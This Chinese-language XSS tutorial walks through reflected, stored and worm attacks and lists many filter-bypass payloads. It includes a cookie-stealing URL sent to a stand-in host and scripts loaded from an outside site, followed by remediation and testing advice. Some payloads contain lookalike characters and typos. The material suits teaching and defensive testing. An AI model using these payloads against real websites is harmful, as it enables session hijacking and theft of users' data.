XSS 攻擊原理

XSS 攻擊場景

Dom-Based XSS 漏洞 攻擊過程如下

Tom 發現了Victim.com中的一個頁面有XSS漏洞，

例如: http://victim.com/search.asp?term=apple

服務器中Search.asp 頁面的代碼大概如下
複製代碼

<html>
　　<title></title>
　　<body>
　　　　Results  for  <%Reequest.QueryString("term")%>
　　　　...
　　</body>
</html>

複製代碼

Tom 先建立一個網站http://badguy.com, 用來接收“偷”來的信息。
然後Tom 構造一個惡意的url(如下), 通過某種方式(郵件，QQ)發給Monica

http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

Monica點擊了這個URL， 嵌入在URL中的惡意Javascript代碼就會在Monica的瀏覽器中執行. 那麼Monica在victim.com網站的cookie, 就會被髮送到badguy網站中。這樣Monica在victim.com 的信息就被Tom盜了.

1. Stored XSS(存儲式XSS漏洞), 該類型是應用廣泛而且有可能影響大Web服務器自身安全的漏洞，攻擊者將攻擊腳本上傳到Web服務器上，使得所有訪問該頁面的用戶都面臨信息泄露的可能。 攻擊過程如下

Alex發現了網站A上有一個XSS 漏洞，該漏洞允許將攻擊代碼保存在數據庫中，

Alex發佈了一篇文章，文章中嵌入了惡意JavaScript代碼。

其他人如Monica訪問這片文章的時候，嵌入在文章中的惡意Javascript代碼就會在Monica的瀏覽器中執行，其會話cookie或者其他信息將被Alex盜走。

Dom-Based XSS漏洞威脅用戶個體，而存儲式XSS漏洞所威脅的對象將是大量的用戶.

XSS Worm攻擊原理剖析

XSS worm是針對站內所有可信任用戶，具有會話的用戶,遠程攻擊者可以利用這個渠道訪問用戶的Cookie和會話信息，通過跨站引用一個JS文件，創建XMLHttpRequest對象，實施xss。

假如有下面一個textbox

value1from是來自用戶的輸入，如果用戶不是輸入value1from,而是輸入

"/><script>alert(document.cookie)</script><!- 

那麼就會變成

<input type="text" name="address1" value=""/>
<script>alert(document.cookie)</script><!- ">

嵌入的JavaScript代碼將會被執行
或者用戶輸入的是 “οnfοcus=”alert(document.cookie)
那麼就會變成

<input type="text" name="address1" value="" onfocus="alert(document.cookie)">

事件被觸發的時候嵌入的JavaScript代碼將會被執行

攻擊的威力，取決於用戶輸入了什麼樣的腳本

XSS不具有瀏覽器通用性。不同的瀏覽器對同一XSS的適用不一樣。相比較而言，IE8和Firefox相對更安全，本身就對XSS攻擊有更嚴格的過濾。而IE6的安全性一般，即使攻擊者的代碼有些“變形”，瀏覽器還是會“盡力而爲”的解析。而其他的一些瀏覽器如opera，XSS安全處理可能做得更差。

本文基本上是在IE6的基礎上給大家分析XSS的變形和繞過。以便大家有針對性的防護。作者參閱了互聯網上一些XSS攻防實戰的例子，彙總成此文。

一、具體內容

XSS的一般原始構造:

<script>alert("anyunix")</script>

上述構造方式由於太過直接而容易被過濾，實際上，針對不同站點的不同過濾機制，對原始構造的適當變形有時就能繞過不少對XSS的檢測。

二、發展

1:很簡單，大家都知道會把<script>過濾掉,卻往往忽略了大小寫:

 <sCripT>alert("anyunix")</Script>

2: `這裏寫代碼片

<IMG SRC=javascript:alert("anyunix")>

3：當簡單的”javascript”形式也被徹底過濾後。我們發現很多對象支持“&#ASCII”的表示方法，

<img src=j&#97vascript:alert("anyunix")>

<img src=j&#97;vascript:alert('anyunix')>

<img src=j&#x61vascript:alert('anyunix')>

<img src=j&#x61;vascript:alert('anyunix')>

&#97可以寫成&#097,&#0097直至&#0000097也是可以執行的。

&#x61也是可以寫成&#061,&#0061直至&#000061的。

4:如果上述編碼亦被還原過濾，可以填入空格、製表符、換行符等空白字符：

<IMG SRC="jav ascript:alert('anyunix');">

5:也可以嵌入編碼過後的TAB鍵等,char09,char10,char13都可以被嵌入:

<IMG SRC="jav&#x09;ascript:alert('anyunix');">

<IMG SRC="jav&#x0A;ascript:alert('anyunix');">

<IMG SRC="jav&#x0D;ascript:alert('anyunix');">

6:當直接用“javascript”終於被徹底禁絕，我們還可以使用其他屬性執行XSS。

<DIV STYLE="width:expression(alert('anyunix'));">

<IMG SRC='vbscript:msgbox("anyunix")'>

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

7:然後，理所當然衍生了新的繞過方式和利用形式。

A):插入註釋/…./做干擾

<IMG STYLE="xss:expr/*XSS*/ession(alert('anyunix'))">

B):全角字符的干擾

<DIV STYLE="width:ｅｘpreｓsion(alert('anyunix'));">

C):“\”的干擾

<STYLE>@im\po\rt'http://ha.ckers.org/xss.css';</STYLE>

8:如果直接執行被完全過濾，那我們就利用事件來執行XSS

<img src="#"οnerrοr=alert('anyunix')>

<img src=http://images.51cto.com/files/uploadimg/20130407/1014480.png"onmousemove=alert(163)>

<BODY ONLOAD=alert('anyunix')>

<isindex type=imagesrc=1οnerrοr=alert('anyunix')>

9:flash可以用來執行XSS

<EMBED SRC="http://ha.ckers.org/xss.swf"AllowScriptAccess="always"></EMBED>

10:也可以利用各種其他標籤

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<LINK REL="stylesheet"HREF="http://ha.ckers.org/xss.css">

<TABLE BACKGROUND="javascript:alert('XSS')">

其他的一些用於混淆、干擾和繞過的bypass實例:

<SCRIPTa=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT=">"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPTa=">'>"SRC="http://ha.ckers.org/xss.js"></SCRIPT>

perl-e'print"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";'>out

<IMG SRC="&#14; javascript:alert('XSS');">

如上，就是一些比較常見和實用的XSS繞過方法。在實際的運用中，往往是多種方法結合起來。

更多更詳盡的XSS測試腳本，可參見http://ha.ckers.org/xss.html建議參閱《OWASP測試指南》，對一些相關的web安全知識做全面的瞭解

XSS蠕蟲之所以能在短時間內快速傳播，是因爲受害者的瀏覽器平臺相近，其中IE、Firefox佔九成，同時社交網絡用戶的好友羣重疊率低，而SNS社交網站具備龐大的用戶數量，所以容易成爲XSS Worm攻擊的主要目標。

XSS蠕蟲通常使用了大量的Ajax技術。Ajax的作用就在於：無須刷新即可異步傳輸數據，經過服務器處理後，得到返回信息，再提示給用戶。如此一來，使跨站蠕蟲具有較強的傳播性和隱蔽性，而且蔓延速度相當驚人，呈幾何級發展。

一個完整的XSS Worm的攻擊流程如下。

① 攻擊者發現目標網站存在XSS漏洞，並且可以編寫XSS蠕蟲。

② 利用一個宿主（如博客空間）作爲傳播源頭進行XSS攻擊。

③ 當其他用戶訪問被感染的空間時，XSS蠕蟲執行以下操作。

判斷用戶是否登錄，如果已登錄就執行下一步；如果沒登錄則執行其他操作。

繼續判斷該用戶是否被感染，如果沒有就將其感染；如果已感染則跳過。

圖5-13所示的流程圖描述了XSS Worm的攻擊過程。

XSS 漏洞修復

原則：　不相信客戶輸入的數據
注意: 攻擊代碼不一定在中

將重要的cookie標記爲http only,   這樣的話Javascript 中的document.cookie語句就不能獲取到cookie了.
只允許用戶輸入我們期望的數據。 例如：　年齡的textbox中，只允許用戶輸入數字。 而數字之外的字符都過濾掉。
對數據進行Html Encode 處理
過濾或移除特殊的Html標籤， 例如: <script>, <iframe> ,  &lt; for <, &gt; for >, &quot for
過濾JavaScript 事件的標籤。例如 "onclick=", "onfocus" 等等。

如何測試XSS漏洞

方法一： 查看代碼，查找關鍵的變量, 客戶端將數據傳送給Web 服務端一般通過三種方式 Querystring, Form表單，以及cookie. 例如在ASP的程序中，通過Request對象獲取客戶端的變量

<%
strUserCode =  Request.QueryString(“code”);
strUser =  Request.Form(“USER”);
strID =    Request.Cookies(“ID”);
%>

假如變量沒有經過htmlEncode處理， 那麼這個變量就存在一個XSS漏洞

方法二：　準備測試腳本，

"/><script>alert(document.cookie)</script><!--
<script>alert(document.cookie)</script><!--
"οnclick="alert(document.cookie)

在網頁中的Textbox或者其他能輸入數據的地方，輸入這些測試腳本， 看能不能彈出對話框，能彈出的話說明存在XSS漏洞

在URL中查看有那些變量通過URL把值傳給Web服務器， 把這些變量的值退換成我們的測試的腳本。 然後看我們的腳本是否能執行

方法三: 自動化測試XSS漏洞
現在已經有很多XSS掃描工具了。 實現XSS自動化測試非常簡單，只需要用HttpWebRequest類。 把包含xss 測試腳本。發送給Web服務器。 然後查看HttpWebResponse中，我們的XSS測試腳本是否已經注入進去了。